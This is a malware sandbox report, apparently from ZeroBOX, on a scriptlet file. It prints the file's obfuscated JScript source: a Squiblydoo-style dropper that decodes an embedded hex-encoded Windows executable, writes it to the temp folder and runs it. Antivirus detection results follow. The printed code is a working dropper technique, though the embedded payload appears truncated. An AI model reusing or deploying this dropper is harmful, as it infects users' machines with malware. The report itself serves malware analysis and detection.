popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
<?XML version="1.023475151836645389002"?>
<!--sPkMscBhdIYztinAGOXZzPpsSYkOtrRiLHsEMKBKdG ZNISvXOwWdJZWvFfskyTLsdGCJabuAkdebCGIskbc-->
<scriptlet>
<registration
progid="811027086300986379264188785832729179209281086959504"
classid="{23422989-2342-2342-3018-805290202768}" >
<!--nIwhpevPeKpKFpSOdtuEOCzhTkOnTBCspIeMUTRsGVspOFKWDXrsndYRp yPYLICGfZHFpkwFpNNrtYwDTF-->
<script language="JScript">
<![CDATA[
var oNrpcavCYZiycJhstUvQ = "LDHLsZCGXVYVdYzAfRNZdLdKFIRkMBfLSYIRkfRUPkJkCfsMARnzrIkZBWhOnrUHRyeeCIiZaSrUdUnByhTVkQCrRICtYeMGzbCeakrSLnzCyyXGOQCdBZAb"
var CXpGvPAtwvewCbJVzvdyEyUfANNEMpTYaisFfJKXPXPuQJyy = "4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000e5dd0408a1bc6a5ba1bc6a5ba1bc6a5b2fb4355ba3bc6a5ba1bc6b5b3abc6a5b22b4375bb0bc6a5bf59f5a5babbc6a5b66ba6c5ba0bc6a5b52696368a1bc6a5b00000000000000000000000000000000504500004c010500155aa0490000000000000000e0000f010b010600005a000000d0010000040000cb30000000100000007000000000400000100000000200000400000000000000040000000000000000d002000004000000000000020000000000100000100000000010000010000000000000100000000000000000000000a4730000b400000000c002008a080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007000008c0200000000000000000000000000000000000000000000000000002e74657874000000ce58000000100000005a00000004000000000000
function oodRobdCTNwSQaMyRutrI( PuEpDWVBVoPtnMKFSIeJISdoHOpAnrIeDwkUsJIcupyEryRVa){
wBKIydAGdvKviyhncQAhcTRHUJcNJsUPKpGPKyTDXzuyFKvAIA = '';
for ( ACJOZrtveifDehvkDQuNy = 0; ACJOZrtveifDehvkDQuNy < ( PuEpDWVBVoPtnMKFSIeJISdoHOpAnrIeDwkUsJIcupyEryRVa.length / 2 ); ACJOZrtveifDehvkDQuNy++ ){
wBKIydAGdvKviyhncQAhcTRHUJcNJsUPKpGPKyTDXzuyFKvAIA+= String.fromCharCode( '0x' + PuEpDWVBVoPtnMKFSIeJISdoHOpAnrIeDwkUsJIcupyEryRVa.substr( ACJOZrtveifDehvkDQuNy * 2, 2 ) );
return wBKIydAGdvKviyhncQAhcTRHUJcNJsUPKpGPKyTDXzuyFKvAIA;
var CFTSrJSpLZVRUyeKfhUiZvwDRzCaAaRWaNQNsobsLvyQGbRaeeJkUCbwrsaWhRPLkYQiIsoRfECNTAXQHCVrsI = new ActiveXObject("WScript.Shell");
var GFiQURniTrdSuPUGBPpvztQYkOAtBQrdPwrPryLXYFEdHiFHiSEHEOIeIdCatQMXZUcVzffcXuhUNMtWkSwIuIyVIhafQEFkSGYGdDkcHBJuHHsWLGREGXLtrioiYZuoGYbaIKSLKbbRYhoUKeAwNbBPP = "tNODrAJGrYWnYZPHSGWFCJViiRyrZJuHVSy"
var cpDhNrOEYPkbtetRvTYJBkpAfDYObFUhCcdEeSAGwJSQFncrYnEGhWfTZcapsZCzVcFnaTMyzyzRryVQBJ = CFTSrJSpLZVRUyeKfhUiZvwDRzCaAaRWaNQNsobsLvyQGbRaeeJkUCbwrsaWhRPLkYQiIsoRfECNTAXQHCVrsI.ExpandEnvironmentStrings("%temp%");
var fyfgreytrdy = cpDhNrOEYPkbtetRvTYJBkpAfDYObFUhCcdEeSAGwJSQFncrYnEGhWfTZcapsZCzVcFnaTMyzyzRryVQBJ + "\\sWwdsDuVwFriyMOREBOdNUYBnXZteCdGIoLeNWpXXbaHBppzvEFzMoiB.exe"
CXpGvPAtwvewCbJVzvdyEyUfANNEMpTYaisFfJKXPXPuQJyy = oodRobdCTNwSQaMyRutrI(CXpGvPAtwvewCbJVzvdyEyUfANNEMpTYaisFfJKXPXPuQJyy);
var IEN = "icyFzvOAORyhdFBFfZCDBQyBWGXusraDvHArkfHZPnVfGVNLUoKNQpNssKEzWIVMUdsXNOiZvG"
MDrKkRUXEzSND = new ActiveXObject("ADODB.Stream");
MDrKkRUXEzSND.Type = 2;
var XLQEHykHtFBJafwnidZPTKitdSZZLebSYWrwiAhdCyfJOYaVTsdGuQnuEyBOzkWoEIKePZiNWVoAEEJe = "NTdbeBrIouiaLS"
MDrKkRUXEzSND.Charset = "ISO-8859-1";
var UnSbneYpWhuQcDcciQtiosCSWytuMSpaneGyBPEYMzoKDLRyWZXRFvGD = "PuZrsDdFvzScnJdKYhtThXMrERftb"
MDrKkRUXEzSND.Open();
var QayXAEnTQcupnOwnMAEN = "aBfhFWQKQBrfiVLaEhzIIOsJiIKyrUbJPeDEzbJUeWnaGJfOQNnMIEhteHZWsDBWzMCbDiMDIEFLFsdIEVHHLAar"
MDrKkRUXEzSND.WriteText(CXpGvPAtwvewCbJVzvdyEyUfANNEMpTYaisFfJKXPXPuQJyy);
MDrKkRUXEzSND.SaveToFile(fyfgreytrdy);
var wsCESvJDESiGDLZGYPIEtMFNZfKoiAJCEkPte = new ActiveXObject("WScript.Shell").Run(fyfgreytrdy);
var rpGiHTQaGsnuXHYDGBzJFSKtPLWIrusBeAXFTFtFBZQZPWtkuhdhYFuCEpyVWkLoZSiCJzKadTk = "ERHYpQFeyVMuFrKpHTTfZXEFKFUPMoroQybUtbRaKCT"
</script>
<!--DdtiuQwczsuJcpUrLBnrovJKkiIH fVavyLRyZISUWMDYAJttRMrPiNCet-->
</registration>
<!--zbITTuipIIOJoLwOdiwsZoTEuFAeHQrZYNEpCFsydrz QJeFZoNoknTFseVfPnGtTFBMvBLbyzQtrTGsIEonvNzbcGHOYkFZSWHwitoDHLUODBwDDEDvavh-->
</scriptlet>
<!--FfBueBdBWZYCCaEWtNMAzBnpXkKNLuQrfrKb GFiQURniTrdSuPUGBPpvztQYkOAtBQrdPwrPryLXYFEdHiFHiSEHEOIeIdCatQMXZUcVzffcXuhUNMtWkSwIuIyVIhafQEFkSGYGdDkcHBJuHHsWLGREGXLtrioiYZuoGYbaIKSLKbbRYhoUKeAwNbBPP-->
Antivirus Signature
Bkav Clean
MicroWorld-eScan Clean
FireEye Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
K7AntiVirus Clean
K7GW Clean
Baidu VBS.Trojan-Dropper.Agent.ap
Cyren Clean
Symantec Clean
ESET-NOD32 JS/TrojanDropper.Agent.OFU
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Xml.Malware.Squiblydoo-6728833-0
Kaspersky HEUR:Trojan.Script.Generic
BitDefender Clean
NANO-Antivirus Trojan.Script.Heuristic-js.iacgm
ViRobot Clean
AegisLab Clean
Rising Dropper.Agent/JS!1.D49D (CLASSIC)
Ad-Aware Clean
Sophos Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Emsisoft Clean
Ikarus Clean
GData Clean
Jiangmin Clean
Avira HTML/Crypted.Gen
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Exploit:Win32/ShellCode!ml
Cynet Malicious (score: 85)
AhnLab-V3 Clean
BitDefenderTheta Clean
ALYac Clean
MAX Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
Panda Clean
Qihoo-360 Clean
No IRMA results available.